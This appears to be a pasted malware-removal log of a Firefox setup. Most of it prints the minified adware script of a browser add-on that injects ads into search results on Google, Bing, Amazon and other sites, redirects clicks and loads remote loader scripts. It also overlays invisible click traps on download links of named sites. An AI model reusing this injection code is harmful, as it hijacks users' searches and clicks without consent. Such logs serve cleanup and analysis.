a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\", dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\", dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://w ... m=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\" ... earch.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a= b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/searc ... arch.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\", \".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"), !1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\", urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild(c)},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c= a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+ b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache[b]);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element: a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder= a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop(c))c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d= 0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix)); if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a[b]=a[b].replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json(c));a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl}, {replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c= 0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b= 0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k[b]))return k[b];return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/, \"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts[b].selector),\"undefined\"!==typeof a.element){a.insert=a.inserts[b].at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left= !1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()}, !1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom); if(!c.match(/\\[##eid##\\]/))return a;c=c.replace(/\\[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse(c);return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node=b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"), c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)},!1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a;if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if(c)for(var d=0;d<c.length;d++)b.events.add(\"click\", function(){try{var b=a(this)}catch(c){}b&&b.parentElement.removeChild(b)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak(); b.j||b.removeSecondClick();b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name; b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d, function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems? b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler(c),__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=5215429406649325095&eid=990&pid=55501&prid=186\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\"); e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler(c),__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\", b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}});;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1749/l.js?aoi=1311798366&pid=1749&zoneid=665715&ext=CostMin&systemid=5215429406649325095&ext=CostMin\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1748/l.js?aoi=1311798366&pid=1748&zoneid=665715&ext=CostMin&systemid=5215429406649325095&ext=CostMin\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1750/l.js?aoi=1311798366&pid=1750&zoneid=665715&ext=CostMin&systemid=5215429406649325095&ext=CostMin\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\")&&document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\").firstElementChild&&(document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\").firstElementChild.onclick=function(){return!1});if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var f=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),g=document.createElement(\"div\");\ng.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");g.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';f.style.position=\"relative\";f.appendChild(g)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(f=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),g=document.createElement(\"div\"),g.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),\ng.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',f.style.position=\"relative\",f.appendChild(g))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var f=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var f=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+\nf.top+\"px;left:\"+f.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(g){}},g=document.createElement(\"script\");g.type=\"text/javascript\";g[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+f.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(g)}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{f=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),\n$(\"#mp3-with-trinity\").remove()}catch(f){}},-1< !navigator.userAgent.indexOf(\"chrome\")?f():(g=document.createElement(\"script\"),g.innerHTML=\"(\"+f.toString()+\")()\",document.body.appendChild(g))}catch(h){}-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")&&(f=document.createElement(\"img\"),f.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\"),f.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\",\ng=document.getElementById(\"r1113566095\").parentNode,g.style.position=\"relative\",g.appendChild(f))})();-1<window.self.location.hostname.indexOf(\"hesefiles.c\")&&(window.self.location.href=\"about:blank\");\nif(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\n\")()\";document.body.appendChild(s)}}if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")}if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"}\n-1<document.location.host.indexOf(\"bookbrowsee.ne\")&&new function(){for(var f=[\"adv.php?\",\"/adv.php?\"],g=0;g<document.links.length;g++)for(var h=document.links[g],k=h.pathname+h.search,m=0;m<f.length;m++)f[m]==k.substr(0,f[m].length)&&\"nofollow\"==h.rel&&\"_blank\"==h.target&&(h.setAttribute(\"onclick\",\"return false\"),h.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))};\nif(-1<document.location.host.indexOf(\"irrorcreator.co\"))for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c[b]==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.host.indexOf(\"loud-vibe.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1),a.addEventListener(\"mousedown\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.host.indexOf(\"p3seal.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1),a.addEventListener(\"mousedown\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.host.indexOf(\"p3vampire.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1),a.addEventListener(\"mousedown\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.href.indexOf(\"necraftdl.com/download.ph\")&&(a=document.getElementById(\"downloadpage\"),b=a.getElementsByTagName(\"a\")[0],d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.width=\"100%\",d.style.height=\"34px\",d.style.left=\"0\",d.style.cursor=\"pointer\",d.style.zIndex=9999,b.parentNode.insertBefore(d,b.previousSibling));\nif(-1<document.location.href.indexOf(\"necraftdl.com\"))for(i=0;i<document.links.length;i++){var link=document.links[i];if(\".exe\"==link.href.substr(-4)){var p=link.parentNode;p.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.top=0;d.style.left=0;d.style.width=\"100%\";d.style.height=\"100%\";d.style.cursor=\"pointer\";d.style.zIndex=9999;p.appendChild(d)}}\nif(-1<document.location.host.indexOf(\"salvapantallas.com.es\"))for(b=0;b<document.links.length;b++)if(\"http://www.screensaverspc.com/\"==docum ... bstr(0,30)){b=document.links[b].parentNode;b.style.position=\"relative\";a=document.createElement(\"div\");a.style.position=\"absolute\";a.style.left=0;a.style.top=0;a.style.width=\"100%\";a.style.height=\"100%\";a.style.zIndex=\"9999\";a.style.cursor=\"pointer\";b.appendChild(a);break}\nif(-1<document.location.host.indexOf(\"p3olimp.ne\")&&document.getElementsByClassName)for(c=document.getElementById(\"download-manager-checkbox\"),c.onchange=function(){for(var f=document.getElementsByClassName(\"nasjfkla\"),g=0;g<f.length;g++)f[g].style.display=c.checked?\"block\":\"none\"},i=0;i<document.links.length;i++){var link=document.links[i],onclick=link.getAttribute(\"onclick\");if(onclick&&-1<onclick.indexOf(\"prepare_download_file\")){var div=link.parentNode;div.style.position=\"relative\";b=document.createElement(\"div\");\nb.className=\"nasjfkla\";b.style.position=\"absolute\";b.style.top=\"-2px\";b.style.left=\"92px\";b.style.width=\"71px\";b.style.height=\"16px\";b.style.zIndex=\"99999\";b.style.cursor=\"pointer\";div.appendChild(b)}}\n-1<location.host.indexOf(\"p3olimp.ne\")&&setTimeout(function(){for(var f=document.getElementById(\"leftside\"),g=0;g<f.children.length;g++)if(/\\bspnBook\\b/.test(f.children[g].className))for(var h=f.children[g].getElementsByTagName(\"a\"),k=0;k<h.length;k++)h[k].setAttribute(\"href\",\"#\"),h[k].setAttribute(\"target\",\"\")},1E3);\nif(-1<document.location.host.indexOf(\"leunlckr.co\")){var b=document.getElementsByTagName(\"button\")[0],b2=document.createElement(\"button\");b2.className=b.className;b2.innerHTML=b.innerHTML;b.parentNode.insertBefore(b2,b);b.parentNode.removeChild(b)}-1<document.referrer.indexOf(\"go.theadsnet.com\")&&document.write(\"\");\n(function(){var f=0;try{if(-1<window.location.href.indexOf(\"ack-free.co\"))var g=setInterval(function(){try{var k=document.getElementById(\"ucd-countdown-1\"),h=[];h.push(1*k.children[2].children[1].children[1].innerText);h.push(1*k.children[2].children[2].children[1].innerText);h.push(1*k.children[3].children[1].children[1].innerText);h.push(1*k.children[3].children[2].children[1].innerText);for(var n=k=0;n<h.length;n++)k+=h[n];if(!(0<k)){clearInterval(g);var l=document.createElement(\"div\");l.style.position=\n\"absolute\";l.style.top=0;l.style.left=0;l.style.width=\"100%\";l.style.height=\"100%\";l.style.zIndex=\"9999\";l.style.cursor=\"pointer\";var r=document.getElementById(\"ucd-countdown-1-content\").children[1];r.style.position=\"relative\";r.appendChild(l)}}catch(v){try{var q=0;jQuery.each(jQuery(\".ucd-figure.ucd-countdown-digit-bottom\"),function(){q+=1*jQuery(this).text()});if(0===q){clearInterval(g);var t=jQuery(\"#ucd-countdown-1-content iframe\"),u=t.parent();t.remove();u.html(\"<img title='Get Download' alt='latbut' src='http://i.imgur.com/At0oA5A.png' height='61' width='373'>\")}}catch(w){\"undefined\"!==\ntypeof f&&30<++f&&clearInterval(g)}}},750)}catch(h){}})();var __intervalcountasd=0,__intervalasd=setInterval(function(){__intervalcountasd++;if(-1<window.location.host.indexOf(\"ownloads.ziddu.co\")){for(var b=0;b<document.links.length;b++)try{var c=document.links[b].href.toLowerCase();if(-1==c.indexOf(\"ww.ziddu.co\")&&-1==c.indexOf(\"#\")&&-1==c.indexOf(\"tunes.apple.co\")&&-1==c.indexOf(\"lay.google.co\")&&-1==c.indexOf(\"/gallery/\")){try{for(var e=document.links[b],f=0;15>=f;f++)e=e.parentNode;if(-1<e.className.indexOf(\"footerbg\"))continue}catch(g){}var d=document.links[b].parentNode;\nif(!(-1<d.className.indexOf(\"addthis_toolbox\"))){d.style.position=\"relative\";var a=document.createElement(\"div\");a.style.position=\"absolute\";a.style.left=0;a.style.top=0;a.style.width=\"100%\";a.style.height=\"100%\";a.style.zIndex=\"9999\";a.style.cursor=\"pointer\";d.appendChild(a)}}}catch(h){}c=document.getElementsByTagName(\"iframe\");for(b=0;b<c.length;b++)try{-1==c[b].src.indexOf(\"acebook.co\")&&-1==c[b].src.indexOf(\"cp.crwdcntrl.ne\")&&(d=c[b].parentNode,d.style.position=\"relative\",a=document.createElement(\"div\"),\na.style.position=\"absolute\",a.style.left=0,a.style.top=0,a.style.width=\"100%\",a.style.height=\"100%\",a.style.zIndex=\"9999\",a.style.cursor=\"pointer\",a.id=b,d.appendChild(a))}catch(k){}}20<__intervalcountasd&&clearInterval(__intervalasd)},500);})();(function(){void(0)})()");
FF - prefs.js..extensions.enabledAddons: faststartff%40gmail.com:4.2.3
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:28.0
FF - user.js - File not found

FF:[b]64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_12_0_0_77.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_12_0_0_77.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.51.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.51.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@SafePCRepair_89.com/Plugin: C:\Program Files (x86)\SafePCRepair_89\bar\1.bin\NP89Stub.dll (Mindspark)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\2014\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\faststartff@gmail.com: C:\Users\2014\AppData\Roaming\Mozilla\Firefox\Profiles\5yfnke57.default\extensions\faststartff@gmail.com [2014.07.13 12:20:56 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 28.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
